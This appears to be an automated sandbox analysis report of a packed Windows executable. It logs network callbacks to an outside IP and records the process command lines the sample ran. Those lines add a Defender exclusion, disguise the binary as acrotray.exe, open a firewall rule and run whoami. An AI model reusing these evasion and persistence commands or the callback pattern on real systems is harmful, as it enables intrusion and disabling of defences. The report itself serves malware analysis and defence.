MD5:8fb77edbae0c40e1e19d82a406b7615a
SHA1:0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
SHA512:4de4c2b2f6c72de263cb0ed42df2f6fc502582a795cc00cd47f33465575e3ee1e85d28b9383e3c2d258e3dc3dd665cab34c4c3f609b3c7145a9e8d0d284da508
SSDEEP:49152:w7tSsBqGiSI6UlFlD6p0PDmkpcaNv9eSY9h:wZSsqPJ60qCR7Nq
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........8M.......#...... ........3...O...3...@...............................P............... ............................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x8fe990
Entrypoint Section:UPX1
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:1
File Version Major:6
File Version Minor:1
Subsystem Version Major:6
Subsystem Version Minor:1
Import Hash:6ed4f5f04d62b18d96b26d6db7c18840

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFE3E68Ah]
dec eax
lea edi, dword ptr [esi-0033C025h]
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007F9F20B1E955h
add ebx, ebx
je 00007F9F20B1E904h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007F9F20B1E923h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007F9F20B1E91Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007F9F20B1E8F1h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007F9F20B1E912h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007F9F20B1E8F2h
rep ret
cld
inc ecx
pop ebx
jmp 00007F9F20B1E90Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007F9F20B1E90Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007F9F20B1E8E8h
lea eax, dword ptr [ecx+01h]
jmp 00007F9F20B1E909h
dec eax
inc ecx
call ebx
adc eax, eax
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007F9F20B1E90Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007F9F20B1E8E6h
sub eax, 03h
jc 00007F9F20B1E91Bh
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi
xor eax, FFFFFFFFh
je 00007F9F20B1E95Ah
sar eax, 1

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x4ff0000x9cUPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
UPX00x10000x33c0000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX10x33d0000x1c20000x1c1c00False0.975809586055data7.86864211163IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
UPX20x4ff0000x10000x200False0.1953125data1.37191358908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLLImport
KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jan 14, 2022 19:11:32.579027891 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:32.635747910 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:32.635886908 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:34.632904053 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:11:34.688898087 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:11:34.689019918 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:11:34.691591024 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:11:34.747591019 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:11:34.750452042 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:11:34.790941954 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:11:47.686625004 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:47.743113995 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:49.884005070 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:11:49.884129047 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:11:50.420911074 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:50.477381945 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:11:50.477534056 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:50.932284117 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:50.989042044 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:51.353740931 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:51.588341951 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:51.642314911 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:51.642400026 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:54.373760939 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:54.425156116 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:57.718404055 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:11:57.758157015 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:58.930190086 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:11:58.987181902 CET6060149753185.112.83.96192.168.2.3
Jan 14, 2022 19:11:58.987879992 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:04.818032026 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:12:04.874435902 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:12:04.953682899 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:04.996277094 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:05.621375084 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:05.678320885 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:12:08.486728907 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:08.680119991 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:10.361368895 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:10.418006897 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:12:11.778111935 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:11.834145069 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:14.003263950 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:14.059753895 CET6060149753185.112.83.96192.168.2.3
Jan 14, 2022 19:12:14.803855896 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:14.846776009 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:16.463815928 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:16.520467997 CET6060149753185.112.83.96192.168.2.3
Jan 14, 2022 19:12:17.875608921 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:17.925992012 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:20.092966080 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:12:20.093099117 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:12:21.388849020 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:21.434753895 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:24.425477028 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:24.468317986 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:25.421443939 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:25.466538906 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:12:25.466624022 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:25.478267908 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:12:27.443866968 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:27.486454010 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:30.189610004 CET6060149753185.112.83.96192.168.2.3
Jan 14, 2022 19:12:30.189863920 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:30.265495062 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:12:30.265763044 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:30.459825039 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:30.504183054 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:31.223900080 CET4975760601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:31.274924994 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:31.280040026 CET6060149757185.112.83.96192.168.2.3
Jan 14, 2022 19:12:31.280154943 CET4975760601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:31.330987930 CET6060149758185.112.83.96192.168.2.3
Jan 14, 2022 19:12:31.331149101 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:33.478296041 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:33.520126104 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:34.886312008 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:12:34.942558050 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:12:36.515907049 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:36.556416988 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:36.861457109 CET4975760601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:36.920067072 CET6060149757185.112.83.96192.168.2.3
Jan 14, 2022 19:12:37.064465046 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:37.120906115 CET6060149758185.112.83.96192.168.2.3
Jan 14, 2022 19:12:37.122276068 CET4975260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:37.178709984 CET6060149752185.112.83.96192.168.2.3
Jan 14, 2022 19:12:39.542526007 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:39.583163977 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:42.552423954 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:42.594436884 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:45.195693970 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:45.252516031 CET6060149753185.112.83.96192.168.2.3
Jan 14, 2022 19:12:45.903798103 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:45.955523968 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:48.963511944 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:49.021083117 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:49.841991901 CET6060149758185.112.83.96192.168.2.3
Jan 14, 2022 19:12:49.842220068 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:49.842771053 CET6060149757185.112.83.96192.168.2.3
Jan 14, 2022 19:12:49.842871904 CET4975760601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:50.044183969 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:12:50.044365883 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:12:50.839134932 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:50.839288950 CET4976260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:50.894877911 CET6060149761185.112.83.96192.168.2.3
Jan 14, 2022 19:12:50.895006895 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:50.895518064 CET6060149762185.112.83.96192.168.2.3
Jan 14, 2022 19:12:50.895688057 CET4976260601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:51.094085932 CET4975760601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:51.094088078 CET4975360601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:51.151305914 CET6060149753185.112.83.96192.168.2.3
Jan 14, 2022 19:12:51.151355982 CET6060149757185.112.83.96192.168.2.3
Jan 14, 2022 19:12:52.906001091 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:52.946322918 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:53.212811947 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:53.269463062 CET6060149761185.112.83.96192.168.2.3
Jan 14, 2022 19:12:55.939783096 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:55.980508089 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:12:58.984086037 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:12:59.025790930 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:02.015341997 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:02.057162046 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:02.416490078 CET4976260601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:02.473051071 CET6060149762185.112.83.96192.168.2.3
Jan 14, 2022 19:13:04.765825033 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:13:04.823055983 CET2000049751185.112.83.96192.168.2.3
Jan 14, 2022 19:13:04.823144913 CET4975120000192.168.2.3185.112.83.96
Jan 14, 2022 19:13:04.844866991 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:04.900923967 CET6060149758185.112.83.96192.168.2.3
Jan 14, 2022 19:13:05.058387995 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:05.110527039 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:08.286319017 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:08.341948986 CET6060149761185.112.83.96192.168.2.3
Jan 14, 2022 19:13:08.649507999 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:08.692653894 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:10.254456997 CET6060149761185.112.83.96192.168.2.3
Jan 14, 2022 19:13:10.254587889 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:10.255367994 CET6060149762185.112.83.96192.168.2.3
Jan 14, 2022 19:13:10.255482912 CET4976260601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:11.274796009 CET4976460601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:11.275356054 CET4976560601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:11.331226110 CET6060149764185.112.83.96192.168.2.3
Jan 14, 2022 19:13:11.331248999 CET6060149765185.112.83.96192.168.2.3
Jan 14, 2022 19:13:11.331394911 CET4976460601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:11.331430912 CET4976560601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:11.671916962 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:11.714335918 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:14.015362978 CET4976460601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:14.071747065 CET6060149764185.112.83.96192.168.2.3
Jan 14, 2022 19:13:14.317514896 CET4976560601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:14.377109051 CET6060149765185.112.83.96192.168.2.3
Jan 14, 2022 19:13:14.704138041 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:14.755925894 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:17.715574980 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:17.765957117 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:19.908477068 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:19.964482069 CET6060149758185.112.83.96192.168.2.3
Jan 14, 2022 19:13:20.777015924 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:20.825982094 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:23.931657076 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:23.984023094 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:25.267054081 CET4976260601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:25.270431995 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:25.326044083 CET6060149762185.112.83.96192.168.2.3
Jan 14, 2022 19:13:25.326064110 CET6060149761185.112.83.96192.168.2.3
Jan 14, 2022 19:13:26.939796925 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:26.985981941 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:29.072695017 CET6060149765185.112.83.96192.168.2.3
Jan 14, 2022 19:13:29.072736025 CET6060149764185.112.83.96192.168.2.3
Jan 14, 2022 19:13:29.072849035 CET4976560601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:29.072937012 CET4976460601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:29.976320028 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:30.034569979 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:30.076354027 CET4976760601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:30.077234983 CET4976860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:30.132801056 CET6060149768185.112.83.96192.168.2.3
Jan 14, 2022 19:13:30.132838011 CET6060149767185.112.83.96192.168.2.3
Jan 14, 2022 19:13:30.133034945 CET4976860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:30.133066893 CET4976760601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:33.008883953 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:33.050292015 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:33.089128971 CET4976860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:33.144635916 CET6060149768185.112.83.96192.168.2.3
Jan 14, 2022 19:13:33.444500923 CET4976760601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:33.501127005 CET6060149767185.112.83.96192.168.2.3
Jan 14, 2022 19:13:34.967093945 CET4975860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:35.023262978 CET6060149758185.112.83.96192.168.2.3
Jan 14, 2022 19:13:36.038081884 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:36.079164982 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:39.066584110 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:39.108380079 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:40.328001976 CET4976260601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:40.329482079 CET4976160601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:40.384402990 CET6060149762185.112.83.96192.168.2.3
Jan 14, 2022 19:13:40.384907961 CET6060149761185.112.83.96192.168.2.3
Jan 14, 2022 19:13:42.121165991 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:42.163395882 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:44.089247942 CET4976460601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:44.089569092 CET4976560601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:44.145680904 CET6060149765185.112.83.96192.168.2.3
Jan 14, 2022 19:13:44.145721912 CET6060149764185.112.83.96192.168.2.3
Jan 14, 2022 19:13:45.153064966 CET6060149750185.112.83.96192.168.2.3
Jan 14, 2022 19:13:45.200545073 CET4975060601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:48.147315025 CET4976860601192.168.2.3185.112.83.96
Jan 14, 2022 19:13:48.153572083 CET6060149768185.112.83.96192.168.2.3
Jan 14, 2022 19:13:48.155612946 CET4976860601192.168.2.3185.112.83.96

HTTP Request Dependency Graph

  • 185.112.83.96:20000

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.349751185.112.83.9620000C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
TimestampkBytes transferredDirectionData
Jan 14, 2022 19:11:34.691591024 CET1129OUTPOST /callback HTTP/1.1
Host: 185.112.83.96:20000
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Data Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56
Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV
Jan 14, 2022 19:11:34.750452042 CET1129INHTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 18:11:34 GMT
Content-Length: 0


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:19:11:30
Start date:14/01/2022
Path:C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe"
Imagebase:0x400000
File size:1843200 bytes
MD5 hash:8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:19:11:31
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:32
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:32
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:32
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:32
Start date:14/01/2022
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Imagebase:0x7ff777fc0000
File size:447488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:19:11:32
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:33
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:33
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:33
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:19:11:33
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:19:11:33
Start date:14/01/2022
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Imagebase:0x7ff6e9d70000
File size:92672 bytes
MD5 hash:98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:34
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C whoami
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:34
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:35
Start date:14/01/2022
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /C "ipconfig //flushdns"
Imagebase:0x7ff76d4d0000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:11:35
Start date:14/01/2022
Path:C:\Windows\System32\whoami.exe
Wow64 process (32bit):false
Commandline:whoami
Imagebase:0x7ff7aa4f0000
File size:70144 bytes
MD5 hash:AA18BE1AD24DE09417C1A7459F5C1701
